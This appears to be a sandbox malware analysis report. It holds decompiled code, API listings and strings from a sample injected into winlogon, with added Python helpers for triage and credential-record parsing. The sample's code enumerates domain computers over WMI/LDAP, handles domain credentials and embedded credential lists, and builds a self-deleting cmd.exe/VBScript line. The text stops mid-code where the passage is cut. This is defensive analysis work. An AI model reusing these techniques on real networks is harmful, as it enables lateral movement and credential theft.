    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 16%
    			E00D66780(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12) {
    				char _v8;
    				char _v16;
    				signed int _v20;
    				short _v1060;
    				char _v2408;
    				char _v4460;
    				char _v4480;
    				char _v4504;
    				char _v4904;
    				void* _v4908;
    				char _v4912;
    				char _v4916;
    				void* _v4920;
    				void* _v4924;
    				intOrPtr _v4928;
    				void _v4932;
    				char _v4933;
    				char _v4940;
    				void* _v4944;
    				char* _v4948;
    				char _v4952;
    				char _v4956;
    				char _v4960;
    				char _v4964;
    				intOrPtr _v4968;
    				intOrPtr _v4972;
    				char _v4976;
    				intOrPtr* _v4980;
    				intOrPtr _v4984;
    				intOrPtr _v4988;
    				unsigned int _v4992;
    				intOrPtr _v4996;
    				signed int _v5000;
    				char _v5004;
    				void* __ebp;
    				signed int _t150;
    				signed int _t151;
    				int _t154;
    				void* _t160;
    				void _t162;
    				intOrPtr _t165;
    				intOrPtr _t166;
    				void _t167;
    				intOrPtr _t168;
    				char* _t170;
    				intOrPtr _t178;
    				void _t179;
    				intOrPtr _t180;
    				intOrPtr* _t181;
    				void* _t182;
    				intOrPtr* _t186;
    				intOrPtr* _t189;
    				intOrPtr _t191;
    				intOrPtr _t192;
    				intOrPtr* _t193;
    				intOrPtr* _t198;
    				intOrPtr* _t200;
    				void* _t201;
    				intOrPtr _t202;
    				signed int _t203;
    				unsigned int _t204;
    				intOrPtr _t216;
    				intOrPtr* _t218;
    				char _t220;
    				intOrPtr* _t227;
    				void* _t228;
    				intOrPtr* _t230;
    				intOrPtr* _t232;
    				intOrPtr _t240;
    				intOrPtr _t245;
    				intOrPtr* _t247;
    				intOrPtr _t248;
    				intOrPtr* _t249;
    				void* _t250;
    				signed int _t251;
    				void* _t257;
    				intOrPtr _t265;
    				intOrPtr _t280;
    				intOrPtr _t281;
    				short* _t291;
    				intOrPtr* _t293;
    				intOrPtr* _t294;
    				intOrPtr _t296;
    				intOrPtr* _t297;
    				intOrPtr _t298;
    				char _t300;
    				intOrPtr _t302;
    				void* _t303;
    				intOrPtr* _t305;
    				intOrPtr _t306;
    				intOrPtr _t308;
    				struct _CRITICAL_SECTION* _t309;
    				intOrPtr* _t310;
    				signed int _t311;
    				void* _t312;
    				void* _t313;
    
    				_push(0xffffffff);
    				_push(E00D7E3B3);
    				_push( *[fs:0x0]);
    				E00D7D900();
    				_t150 =  *0xd88004; // 0x276b9783
    				_t151 = _t150 ^ _t311;
    				_v20 = _t151;
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t151);
    				 *[fs:0x0] =  &_v16;
    				_t245 = _a4;
    				_t291 = 0;
    				_t300 = _a8;
    				_v4928 = _t245;
    				_v4912 = _t300;
    				_v4968 = _a12;
    				_v4976 = 0;
    				_v4948 = 0;
    				_t154 = NetGetDCName(0, 0,  &_v4948);
    				if(_t154 != 0) {
    					L49:
    					 *[fs:0x0] = _v16;
    					return E00D6ABE4(_v20 ^ _t311);
    				}
    				__imp__CoInitializeEx(_t154, _t154);
    				if(_t154 < 0) {
    					L48:
    					NetApiBufferFree(_v4948);
    					goto L49;
    				}
    				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 2, 0, 0, 0);
    				if(_t154 >= 0 || _t154 == 0x80010119) {
    					_v4944 = _t291;
    					__imp__CredUIParseUserNameW(_t245,  &_v4460, 0x201,  &_v2408, 0x151);
    					_t160 = LocalAlloc(0x40, 0x1c);
    					_t247 = __imp__#2;
    					_v4908 = _t160;
    					_t162 =  *_t247( &_v4460);
    					_v4932 = _t162;
    					_t302 =  *_t247(_t300);
    					_t165 =  *_t247( &_v2408);
    					_t293 = __imp__#7;
    					_t248 = _t165;
    					_t166 =  *_t293(_t302);
    					_t257 = _v4908;
    					 *((intOrPtr*)(_t257 + 0x10)) = _t302;
    					_t303 = _t257;
    					 *((intOrPtr*)(_t257 + 0x14)) = _t166;
    					_t167 = _v4932;
    					 *_t303 = _t167;
    					_t168 =  *_t293(_t167);
    					 *((intOrPtr*)(_t303 + 4)) = _t168;
    					 *((intOrPtr*)(_t303 + 8)) = _t248;
    					 *((intOrPtr*)(_t303 + 0xc)) =  *_t293(_t248);
    					_t170 =  &_v4944;
    					 *((intOrPtr*)(_t303 + 0x18)) = 2;
    					__imp__CoCreateInstance(0xd7f4b8, 0, 1, 0xd7f3e8, _t170);
    					_t249 = __imp__#6;
    					if(_t170 < 0) {
    						L46:
    						 *_t249( *((intOrPtr*)(_t303 + 8)));
    						 *_t249( *((intOrPtr*)(_t303 + 0x10)));
    						 *_t249( *_t303);
    						LocalFree(_t303);
    						_t291 = _v4976;
    						goto L47;
    					}
    					wsprintfW( &_v1060, L"%s\\root\\directory\\LDAP", _v4948);
    					_t294 = __imp__#2;
    					_t313 = _t312 + 0xc;
    					_t178 =  *_t294( &_v1060);
    					_v4972 = _t178;
    					_t179 =  *_t294(_v4928);
    					_v4932 = _t179;
    					_t180 =  *_t294(_v4912);
    					_v4924 = 0;
    					_t280 = _t180;
    					_t181 = _v4944;
    					_v4988 = _t280;
    					_t182 =  *((intOrPtr*)( *_t181 + 0xc))(_t181, _v4972, _v4932, _t280, 0, 0, 0, 0,  &_v4924);
    					_t303 = _v4908;
    					if(_t182 < 0) {
    						L45:
    						 *_t249(_v4972);
    						 *_t249(_v4988);
    						 *_t249(_v4932);
    						_t186 = _v4944;
    						 *((intOrPtr*)( *_t186 + 8))(_t186);
    						goto L46;
    					}
    					_push(0);
    					_push(_t303);
    					_t305 = __imp__CoSetProxyBlanket;
    					_push(3);
    					_push(6);
    					_push(0xffffffff);
    					_push(0xffffffff);
    					_push(0xffffffff);
    					_push(_v4924);
    					if( *_t305() < 0) {
    						L44:
    						_t189 = _v4924;
    						 *((intOrPtr*)( *_t189 + 8))(_t189);
    						_t303 = _v4908;
    						goto L45;
    					}
    					_t191 =  *_t294(L"WQL");
    					_v4928 = _t191;
    					_t192 =  *_t294(L"SELECT ds_cn FROM ds_computer");
    					_v4920 = 0;
    					_push( &_v4920);
    					_t296 = _v4928;
    					_t281 = _t192;
    					_t193 = _v4924;
    					_push(0);
    					_push(0x30);
    					_push(_t281);
    					_push(_t296);
    					_push(_t193);
    					_v4984 = _t281;
    					if( *((intOrPtr*)( *_t193 + 0x50))() < 0) {
    						L43:
    						 *_t249(_t296);
    						 *_t249(_v4984);
    						goto L44;
    					}
    					_push(0);
    					_push(_v4908);
    					_push(3);
    					_push(6);
    					_push(0xffffffff);
    					_push(0xffffffff);
    					_push(0xffffffff);
    					_push(_v4920);
    					if( *_t305() < 0) {
    						L42:
    						_t198 = _v4920;
    						 *((intOrPtr*)( *_t198 + 8))(_t198);
    						goto L43;
    					}
    					_v4960 = 0;
    					_v4956 = 0;
    					_v4952 = 0;
    					_v8 = 0;
    					_v4916 = 0;
    					asm("o16 nop [eax+eax]");
    					do {
    						_t200 = _v4920;
    						_t201 =  *((intOrPtr*)( *_t200 + 0x10))(_t200, 0xffffffff, 5,  &_v4480,  &_v4916);
    						_t202 = _v4916;
    						if(_t201 < 0) {
    							goto L28;
    						}
    						if(_t202 == 0) {
    							break;
    						}
    						_t251 = 0;
    						_v4976 = 1;
    						if(_t202 == 0) {
    							break;
    						}
    						do {
    							_t227 =  *((intOrPtr*)(_t311 + _t251 * 4 - 0x117c));
    							_t275 =  *_t227;
    							_t228 =  *((intOrPtr*)( *_t227 + 0x10))(_t227, L"ds_cn", 0,  &_v5004, 0, 0);
    							_t327 = _t228;
    							if(_t228 < 0) {
    								goto L27;
    							}
    							_t298 = _v4996;
    							_t232 = E00D6ABFA(_t251, _t275, _t298, _t305, _t327, 0xc);
    							_t310 = _t232;
    							_t313 = _t313 + 4;
    							_v4980 = _t310;
    							_v8 = 1;
    							if(_t310 == 0) {
    								L19:
    								_t305 = 0;
    								L20:
    								_v8 = 0;
    								_v4912 = _t305;
    								if(_t305 == 0) {
    									L18:
    									E00D6B9A0(0x8007000e);
    									goto L19;
    								}
    								_v8 = 2;
    								E00D67980( &_v4504, _t298,  *_t305);
    								_v8 = 3;
    								E00D674A0( &_v4960,  &_v4504);
    								E00D67940( &_v4504);
    								_t82 = _t305 + 8; // 0x8
    								_v8 = 0;
    								if(InterlockedDecrement(_t82) == 0) {
    									_t240 =  *_t305;
    									if(_t240 != 0) {
    										__imp__#6(_t240);
    										 *_t305 = 0;
    									}
    									_t241 =  *((intOrPtr*)(_t305 + 4));
    									if( *((intOrPtr*)(_t305 + 4)) != 0) {
    										E00D6ABF5(_t241);
    										_t313 = _t313 + 4;
    										 *((intOrPtr*)(_t305 + 4)) = 0;
    									}
    									_push(0xc);
    									E00D6AC32(_t305);
    									_t313 = _t313 + 8;
    								}
    								goto L27;
    							}
    							 *((intOrPtr*)(_t310 + 4)) = 0;
    							 *((intOrPtr*)(_t310 + 8)) = 1;
    							__imp__#2(_t298);
    							 *_t310 = _t232;
    							if(_t232 != 0 || _t298 == 0) {
    								goto L20;
    							} else {
    								goto L18;
    							}
    							L27:
    							__imp__#9( &_v5004);
    							_t230 =  *((intOrPtr*)(_t311 + _t251 * 4 - 0x117c));
    							 *((intOrPtr*)( *_t230 + 8))(_t230);
    							_t202 = _v4916;
    							_t251 = _t251 + 1;
    						} while (_t251 < _t202);
    						L28:
    					} while (_t202 != 0);
    					_t203 =  &_v4933;
    					_t265 = 0x20;
    					_v5000 = _t203;
    					_t204 = _t203 | 0xffffffff;
    					do {
    						_t204 = _t204 >> 1;
    						_t265 = _t265 - 1;
    					} while (_t204 > 0x7fff);
    					_t306 = _v4956;
    					_t297 = _v4960;
    					_v4992 = _t204;
    					_v4996 = _t265;
    					E00D68C10(_t297, _t306,  &_v5000);
    					_t268 = _t306 - _t297;
    					if((0x2aaaaaab * (_t306 - _t297) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t306 - _t297) >> 0x20 >> 2) > 0x64) {
    						E00D673C0( &_v4960, _t268);
    						_t306 = _v4956;
    						_t297 = _v4960;
    					}
    					__imp__#115(0x202,  &_v4904);
    					_v4940 = 0;
    					_t250 = 0;
    					_t216 = (0x2aaaaaab * (_t306 - _t297) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t306 - _t297) >> 0x20 >> 2);
    					_v4980 = _t216;
    					if(_t216 == 0) {
    						L41:
    						__imp__#116();
    						_v8 = 0xffffffff;
    						E00D679E0(_t250,  &_v4960, _t297);
    						_t249 = __imp__#6;
    						_t296 = _v4928;
    						goto L42;
    					} else {
    						do {
    							if( *((intOrPtr*)(_t297 + 0x14)) < 8) {
    								_t218 = _t297;
    							} else {
    								_t218 =  *_t297;
    							}
    							__imp__GetAddrInfoW(_t218, 0, 0,  &_v4940);
    							_t220 =  *((intOrPtr*)(_v4940 + 0x18));
    							__imp__#14( *((intOrPtr*)(_t220 + 4)));
    							_t308 = _v4968;
    							_v4964 = _t220;
    							_v4912 = 0;
    							if(E00D67C20(_t250, _t308, _t297,  &_v4964,  &_v4912) != 0 && _v4912 == 0) {
    								_t309 = _t308 + 0xc;
    								EnterCriticalSection(_t309);
    								E00D67B20(_t250, _v4968, _t297,  &_v4964);
    								LeaveCriticalSection(_t309);
    							}
    							__imp__FreeAddrInfoW(_v4940);
    							_t250 = _t250 + 1;
    							_t297 = _t297 + 0x18;
    						} while (_t250 < _v4980);
    						goto L41;
    					}
    				} else {
    					L47:
    					__imp__CoUninitialize();
    					goto L48;
    				}
    			}
    Address column (one entry per C-code line above, 0x00000000 where a line has no mapped instruction): 0x00d66783 to 0x00d66dc6

    APIs
    • NetGetDCName.NETAPI32(00000000,00000000,?,276B9783,?,?,?,?,00D7E3B3,000000FF), ref: 00D667E4
    • CoInitializeEx.OLE32(00000000,00000000), ref: 00D667F4
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D6680D
    • CredUIParseUserNameW.CREDUI(?,?,00000201,?,00000151,?,?,?,?,00D7E3B3,000000FF), ref: 00D66841
    • LocalAlloc.KERNEL32(00000040,0000001C,?,?,?,?,00D7E3B3,000000FF), ref: 00D6684B
    • SysAllocString.OLEAUT32(?), ref: 00D66864
    • SysAllocString.OLEAUT32(?), ref: 00D6686D
    • SysAllocString.OLEAUT32(?), ref: 00D66878
    • SysStringLen.OLEAUT32(00000000), ref: 00D66883
    • SysStringLen.OLEAUT32(?), ref: 00D6689C
    • SysStringLen.OLEAUT32(00000000), ref: 00D668A5
    • CoCreateInstance.OLE32(00D7F4B8,00000000,00000001,00D7F3E8,?), ref: 00D668C6
    • wsprintfW.USER32 ref: 00D668EC
    • SysAllocString.OLEAUT32(?), ref: 00D66902
    • SysAllocString.OLEAUT32(?), ref: 00D66910
    • SysAllocString.OLEAUT32(?), ref: 00D6691E
    • CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D66981
    • SysAllocString.OLEAUT32(WQL), ref: 00D66990
    • SysAllocString.OLEAUT32(SELECT ds_cn FROM ds_computer), ref: 00D6699D
    • CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D669F1
    • SysAllocString.OLEAUT32(?), ref: 00D66AD6
    • InterlockedDecrement.KERNEL32(00000008), ref: 00D66B3A
    • SysFreeString.OLEAUT32(00000000), ref: 00D66B4B
    • VariantClear.OLEAUT32(?), ref: 00D66B80
    • WSAStartup.WS2_32(00000202,?), ref: 00D66C33
    • GetAddrInfoW.WS2_32(00000000,00000000,00000000,00000000), ref: 00D66C7C
    • htonl.WS2_32(00000000), ref: 00D66C8E
      • Part of subcall function 00D67C20: EnterCriticalSection.KERNEL32(?,00D655C6,?,?,?,vector<T> too long,00000000,?,?,?,00D6763D,?,?,?,?,?), ref: 00D67C47
      • Part of subcall function 00D67C20: LeaveCriticalSection.KERNEL32(00D655C6,?,vector<T> too long,00000000,?,?,?,00D6763D,?,?,?,?,?,?,00D655C6,?), ref: 00D67C79
    • EnterCriticalSection.KERNEL32(?,?,?), ref: 00D66CD0
    • LeaveCriticalSection.KERNEL32(?,?), ref: 00D66CE9
    • FreeAddrInfoW.WS2_32(00000000), ref: 00D66CF5
    • WSACleanup.WS2_32 ref: 00D66D0B
    • SysFreeString.OLEAUT32(?), ref: 00D66D3C
    • SysFreeString.OLEAUT32(?), ref: 00D66D44
    • SysFreeString.OLEAUT32(?), ref: 00D66D5E
    • SysFreeString.OLEAUT32(?), ref: 00D66D66
    • SysFreeString.OLEAUT32(?), ref: 00D66D6E
    • SysFreeString.OLEAUT32(?), ref: 00D66D7F
    • SysFreeString.OLEAUT32(?), ref: 00D66D84
    • SysFreeString.OLEAUT32(?), ref: 00D66D88
    • LocalFree.KERNEL32(?,?,?,?,?,00D7E3B3,000000FF), ref: 00D66D8B
    • CoUninitialize.OLE32 ref: 00D66D97
    • NetApiBufferFree.NETAPI32(?,?,?,?,?,00D7E3B3,000000FF), ref: 00D66DA3
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    APIs
    • SysAllocString.OLEAUT32(Create), ref: 00D644C6
    • SysAllocString.OLEAUT32(Win32_Process), ref: 00D644CF
    • SysAllocString.OLEAUT32(cmd.exe /c (echo strPath = Wscript.ScriptFullName & echo.Set FSO = CreateObject^("Scripting.FileSystemObject"^) & echo.FSO.DeleteF), ref: 00D6453A
    • SysFreeString.OLEAUT32(?), ref: 00D64597
    • SysFreeString.OLEAUT32(00000000), ref: 00D645B5
    • SysFreeString.OLEAUT32(?), ref: 00D645BA
    Strings
    • Create, xrefs: 00D644C1
    • CommandLine, xrefs: 00D6455C
    • Win32_Process, xrefs: 00D644C8
    • cmd.exe /c (echo strPath = Wscript.ScriptFullName & echo.Set FSO = CreateObject^("Scripting.FileSystemObject"^) & echo.FSO.DeleteF, xrefs: 00D64535
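    The two API listings above (E00D66780 and the caller at 0x00D644xx) carry the strings that characterise this sample: NetGetDCName, a CredUIParseUserNameW split of a DOMAIN\user credential, the WQL query SELECT ds_cn FROM ds_computer run against a \\<DC>\root\directory\LDAP namespace (domain computer enumeration through the WMI LDAP provider), GetAddrInfoW per discovered host, and a Win32_Process Create of cmd.exe /c that echoes a VBScript deleting a file through Scripting.FileSystemObject (the string is truncated in the report). The Python below is an added triage helper, not part of the report or of the sample: it parses lines in the report's own "• Api.MODULE(args), ref: ADDR" format and tags those behaviours. The input lines are copied from the listings above, and the tag names are this example's own vocabulary.

```python
import re
from collections import namedtuple

# Lines in the report's own format, copied from the API listings above.
REPORT_LINES = """
• NetGetDCName.NETAPI32(00000000,00000000,?,276B9783,?,?,?,?,00D7E3B3,000000FF), ref: 00D667E4
• CredUIParseUserNameW.CREDUI(?,?,00000201,?,00000151,?,?,?,?,00D7E3B3,000000FF), ref: 00D66841
• wsprintfW.USER32 ref: 00D668EC
• CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D66981
• SysAllocString.OLEAUT32(WQL), ref: 00D66990
• SysAllocString.OLEAUT32(SELECT ds_cn FROM ds_computer), ref: 00D6699D
• GetAddrInfoW.WS2_32(00000000,00000000,00000000,00000000), ref: 00D66C7C
  • Part of subcall function 00D67C20: EnterCriticalSection.KERNEL32(?,00D655C6,?,?,?,vector<T> too long,00000000,?,?,?,00D6763D,?,?,?,?,?), ref: 00D67C47
• SysAllocString.OLEAUT32(Create), ref: 00D644C6
• SysAllocString.OLEAUT32(Win32_Process), ref: 00D644CF
• SysAllocString.OLEAUT32(cmd.exe /c (echo strPath = Wscript.ScriptFullName & echo.Set FSO = CreateObject^("Scripting.FileSystemObject"^) & echo.FSO.DeleteF), ref: 00D6453A
"""

ApiCall = namedtuple("ApiCall", "name module args ref")

# "(.*)" is greedy on purpose so parentheses inside string arguments (the cmd.exe
# line) stay part of the argument; lines without an argument list (wsprintfW) and
# "Part of subcall function" entries are accepted too.
_LINE = re.compile(
    r"^\W*(?:Part of subcall function \w+:\s*)?(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)


def parse_api_lines(text):
    """Turn the report's API listing into ApiCall records; unparsable lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            name, module, args, ref = m.groups()
            calls.append(ApiCall(name, module, args or "", ref.upper()))
    return calls


def tag_behaviours(calls):
    """Map behaviour tag -> list of refs (addresses) that support it."""
    tags = {}

    def add(tag, call):
        tags.setdefault(tag, []).append(call.ref)

    for c in calls:
        if c.name == "NetGetDCName":
            add("locate_domain_controller", c)
        elif c.name == "CredUIParseUserNameW":
            add("split_domain_credential", c)
        elif c.name == "GetAddrInfoW":
            add("resolve_target_hosts", c)
        elif c.name == "SysAllocString":
            arg = c.args.lower()
            if arg.startswith("select ") and "ds_computer" in arg:
                add("wmi_ldap_computer_enumeration", c)
            elif arg.startswith("cmd.exe") and "scripting.filesystemobject" in arg and "delete" in arg:
                add("self_delete_via_vbscript", c)

    # Win32_Process plus Create as BSTRs is the WMI process-creation pattern.
    strings = [c for c in calls if c.name == "SysAllocString"]
    if {"Win32_Process", "Create"} <= {c.args for c in strings}:
        add("wmi_process_creation", next(c for c in strings if c.args == "Create"))
    return tags


def triage(text):
    return tag_behaviours(parse_api_lines(text))
```

    The same parser applies to any function's API listing in a report of this format; the tag vocabulary is deliberately small and keyed on the strings visible here rather than on API names alone, since SysAllocString on its own says nothing.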
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 74%
    			E00D626C0(void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed int _v8;
    				intOrPtr _v12;
    				char _v1052;
    				void* _v1056;
    				signed int _t16;
    				void** _t22;
    				intOrPtr _t24;
    				signed int _t25;
    				signed int _t29;
    				signed int _t32;
    				signed int _t33;
    				intOrPtr* _t42;
    				signed int _t43;
    				void* _t47;
    				void* _t49;
    				intOrPtr* _t51;
    				signed int _t52;
    
    				_t16 =  *0xd88004; // 0x276b9783
    				_v8 = _t16 ^ _t52;
    				_push(0xdeefbad7);
    				_t51 = __edx;
    				_t49 = __ecx;
    				_push(__edx);
    				if(E00D61A30(0, __ecx) == 0 || IsValidSid(_t49) == 0) {
    					L10:
    					__eflags = _v8 ^ _t52;
    					return E00D6ABE4(_v8 ^ _t52);
    				} else {
    					_t22 =  &_v1056;
    					_v1056 = 0;
    					__imp__ConvertSidToStringSidW(_t49, _t22);
    					if(_t22 == 0) {
    						goto L10;
    					} else {
    						_t23 = _v1056;
    						if(_v1056 == 0) {
    							goto L10;
    						} else {
    							_t24 = E00D715F6(__ebx, _t49, _t51, _t23, L"S-1-5-18");
    							if(_t24 != 0) {
    								_t25 = E00D715F6(__ebx, _t49, _t51, _v1056, L"S-1-5-19");
    								__eflags = _t25;
    								if(_t25 == 0) {
    									L17:
    									 *_t51 = 1;
    									goto L18;
    								} else {
    									_t29 = E00D715F6(__ebx, _t49, _t51, _v1056, L"S-1-5-20");
    									__eflags = _t29;
    									if(_t29 == 0) {
    										goto L17;
    									} else {
    										E00D6D520(_t49,  &_v1052, 0, 0x414);
    										_t32 = E00D62650(_t49,  &_v1052, __eflags);
    										__eflags = _t32;
    										if(_t32 != 0) {
    											__eflags = _v12 - 1;
    											if(_v12 != 1) {
    												L16:
    												 *_t51 = 3;
    											} else {
    												_t42 =  &_v1052;
    												_t47 = _t42 + 2;
    												asm("o16 nop [eax+eax]");
    												do {
    													_t33 =  *_t42;
    													_t42 = _t42 + 2;
    													__eflags = _t33;
    												} while (_t33 != 0);
    												_t43 = _t42 - _t47;
    												__eflags = _t43;
    												if(_t43 == 0) {
    													goto L16;
    												} else {
    													 *_t51 = 2;
    												}
    											}
    											goto L18;
    										} else {
    											LocalFree(_v1056);
    											goto L10;
    										}
    									}
    								}
    							} else {
    								 *_t51 = _t24;
    								L18:
    								LocalFree(_v1056);
    								return E00D6ABE4(_v8 ^ _t52);
    							}
    						}
    					}
    				}
    			}
    Address column (one entry per C-code line above, 0x00000000 where a line has no mapped instruction): 0x00d626c9 to 0x00d62817

    APIs
    • IsValidSid.ADVAPI32 ref: 00D626F3
    • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00D62713
      • Part of subcall function 00D62650: LookupAccountSidW.ADVAPI32(00000000,?,?,00000103,?,?,?), ref: 00D626A1
    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00D627A3
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • LocalFree.KERNEL32(00000000,?,?,?), ref: 00D627FD
    Strings
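    E00D626C0 above classifies a SID: after IsValidSid and ConvertSidToStringSidW it string-compares against S-1-5-18 (SYSTEM, result 0), then S-1-5-19 and S-1-5-20 (LOCAL SERVICE and NETWORK SERVICE, result 1); otherwise E00D62650 calls LookupAccountSidW into a 0x414-byte buffer and the result is 2 when the SID_NAME_USE at offset 0x410 equals SidTypeUser (1) and the account name at offset 0 is non-empty, else 3. If the lookup fails the function frees the string and returns without writing a result. The Python below is an added illustration for this report, not the sample's code: it implements the binary-SID to string conversion that ConvertSidToStringSidW performs and the same classification, with the account lookup passed in as a callable so it runs without Windows. The SIDs and the lookup table are constructed here; the result codes 0..3 are the values the listing writes through _t51.

```python
import struct

SID_TYPE_USER = 1  # SID_NAME_USE value the listing tests (_v12 == 1)


def sid_to_string(blob):
    """Binary SID -> "S-R-I-S1-S2-..." (what ConvertSidToStringSidW returns)."""
    if len(blob) < 8:
        raise ValueError("SID header truncated")
    revision, count = blob[0], blob[1]
    if revision != 1 or count > 15 or len(blob) != 8 + 4 * count:
        raise ValueError("invalid SID")            # what IsValidSid rejects
    authority = int.from_bytes(blob[2:8], "big")   # 48-bit identifier authority, big-endian
    subs = struct.unpack("<%dI" % count, blob[8:])  # sub-authorities, little-endian
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def classify_sid(blob, lookup_account_sid):
    """Return the code E00D626C0 stores: 0 SYSTEM, 1 LOCAL/NETWORK SERVICE,
    2 named user account, 3 anything else. None when the lookup fails (the
    listing then returns without writing a result)."""
    sid = sid_to_string(blob)
    if sid == "S-1-5-18":
        return 0
    if sid in ("S-1-5-19", "S-1-5-20"):
        return 1
    result = lookup_account_sid(sid)               # stand-in for LookupAccountSidW
    if result is None:
        return None
    name, _domain, sid_type = result
    return 2 if sid_type == SID_TYPE_USER and name else 3


def make_sid(authority, *subs):
    """Build a binary SID for testing (revision 1)."""
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


# Constructed stand-in for LookupAccountSidW: sid -> (name, domain, SID_NAME_USE).
CONSTRUCTED_ACCOUNTS = {
    "S-1-5-21-1000-2000-3000-1001": ("alice", "CORP", 1),            # SidTypeUser
    "S-1-5-21-1000-2000-3000-512": ("Domain Admins", "CORP", 2),     # SidTypeGroup
    "S-1-5-32-544": ("Administrators", "BUILTIN", 4),                # SidTypeAlias
}


def constructed_lookup(sid):
    return CONSTRUCTED_ACCOUNTS.get(sid)
```

    On a live system the callable would wrap LookupAccountSidW; the three well-known SIDs are matched on the string form exactly as the listing does, before any lookup is attempted.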
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
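    The function E00D636A0 listed next walks a wide string for credential records delimited by <STARTCRED>, <STARTPASS> and <ENDCRED> (the values 0xb, 0xb and 9 read from 0xd85d70, 0xd85d6c and 0xd85d68 are the marker lengths). For each record it takes the user name as the text between <STARTCRED> and <STARTPASS> and the password as the text between <STARTPASS> and <ENDCRED>, rejects the record when the password is 0x20 or more characters, the user name is 0x100 or more characters, or either field contains a character below 0x20, and otherwise copies both fields (at most 0xff characters each) into a 0x200-byte structure handed to E00D62540. Scanning resumes just after <ENDCRED> and stops at the first record whose three markers are missing or out of order. The Python below is an added parser with the same rules, not code from the sample, so an analyst can run it over strings pulled from the process memory dump to recover the embedded credential list. It assumes E00D67E20 is a find-from-offset and E00D67900 a substring on a std::wstring; the input blob is constructed.

```python
START_CRED, START_PASS, END_CRED = "<STARTCRED>", "<STARTPASS>", "<ENDCRED>"
MAX_PASS = 0x20    # password length must be below this (the _v608 >= 0x20 test)
MAX_USER = 0x100   # user name length must be below this (the _t128 >= 0x100 test)


def _printable(field):
    # The sample walks each field and bails out at the first character below 0x20.
    return all(ord(ch) >= 0x20 for ch in field)


def parse_credential_records(text):
    """Return [(user, password, accepted), ...] in the order the sample sees them.
    Scanning stops at the first missing or out-of-order marker triple, like the
    break out of E00D636A0's while loop."""
    records = []
    pos = 0
    while True:
        pc = text.find(START_CRED, pos)
        pp = text.find(START_PASS, pos)
        pe = text.find(END_CRED, pos)
        if -1 in (pc, pp, pe) or pc >= pp or pp >= pe:
            break
        user = text[pc + len(START_CRED):pp]
        password = text[pp + len(START_PASS):pe]
        accepted = (len(password) < MAX_PASS and len(user) < MAX_USER
                    and _printable(user) and _printable(password))
        records.append((user, password, accepted))
        pos = pe + len(END_CRED)   # _v612 = pe + 9: resume after <ENDCRED>
    return records


def recover_credentials(text):
    """Only the records the sample would actually hand to E00D62540."""
    return [(u, p) for u, p, ok in parse_credential_records(text) if ok]


# Constructed input, not from the sample: four records plus a truncated tail.
SAMPLE_BLOB = "".join([
    "<STARTCRED>CORP\\alice<STARTPASS>Winter2018!<ENDCRED>",
    "<STARTCRED>CORP\\svc_backup<STARTPASS>" + "x" * 40 + "<ENDCRED>",  # password too long
    "<STARTCRED>CORP\\bob<STARTPASS>bad\tpass<ENDCRED>",                  # control character
    "<STARTCRED>CORP\\carol<STARTPASS>Spring2018!<ENDCRED>",
    "<STARTCRED>truncated",
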